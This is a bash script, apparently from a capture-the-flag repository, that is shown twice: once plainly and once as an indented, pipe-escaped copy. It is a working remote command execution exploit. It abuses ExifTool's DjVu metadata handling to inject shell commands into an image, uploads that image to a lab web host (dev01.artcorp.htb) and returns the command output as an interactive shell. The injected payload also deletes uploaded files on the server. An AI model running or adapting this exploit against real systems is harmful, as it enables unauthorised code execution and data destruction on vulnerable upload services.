xl00t/rce.sh

## rce.sh
#!/usr/bin/env bash

while true; do
    read -p "> " userinput
    if [[ "$userinput" =~ "exit" ]]; then exit; fi
    payload="(metadata \"\\c\${system('rm uploads/*.jpg;echo dfff0a70fa1a55c8c1a4966c19f6da452 ; $userinput ; echo dfff0a70fa1a55c8c1a4966c19f6da452')};\")"
    echo $payload > payload
    bzz payload payload.bzz
    djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
    exiftool -config configfile '-HasselbladExif<=exploit.djvu' hacker.jpg 1> /dev/null

    curl http://dev01.artcorp.htb/metaview/index.php -F "imageUpload=@hacker.jpg" 2> /dev/null | sed -n -e '/dfff0a70fa1a55c8c1a4966c19f6da452/,/dfff0a70fa1a55c8c1a4966c19f6da452/ p' | sed 's/dfff0a70fa1a55c8c1a4966c19f6da452//' | sed 's/<pre>//' | sed '/^[[:space:]]*$/d'
done
	#!/usr/bin/env bash

	while true; do
	read -p "> " userinput
	if [[ "$userinput" =~ "exit" ]]; then exit; fi
	payload="(metadata \"\\c\${system('rm uploads/*.jpg;echo dfff0a70fa1a55c8c1a4966c19f6da452 ; $userinput ; echo dfff0a70fa1a55c8c1a4966c19f6da452')};\")"
	echo $payload > payload
	bzz payload payload.bzz
	djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
	exiftool -config configfile '-HasselbladExif<=exploit.djvu' hacker.jpg 1> /dev/null

	curl http://dev01.artcorp.htb/metaview/index.php -F "imageUpload=@hacker.jpg" 2> /dev/null \| sed -n -e '/dfff0a70fa1a55c8c1a4966c19f6da452/,/dfff0a70fa1a55c8c1a4966c19f6da452/ p' \| sed 's/dfff0a70fa1a55c8c1a4966c19f6da452//' \| sed 's/<pre>//' \| sed '/^[[:space:]]*$/d'
	done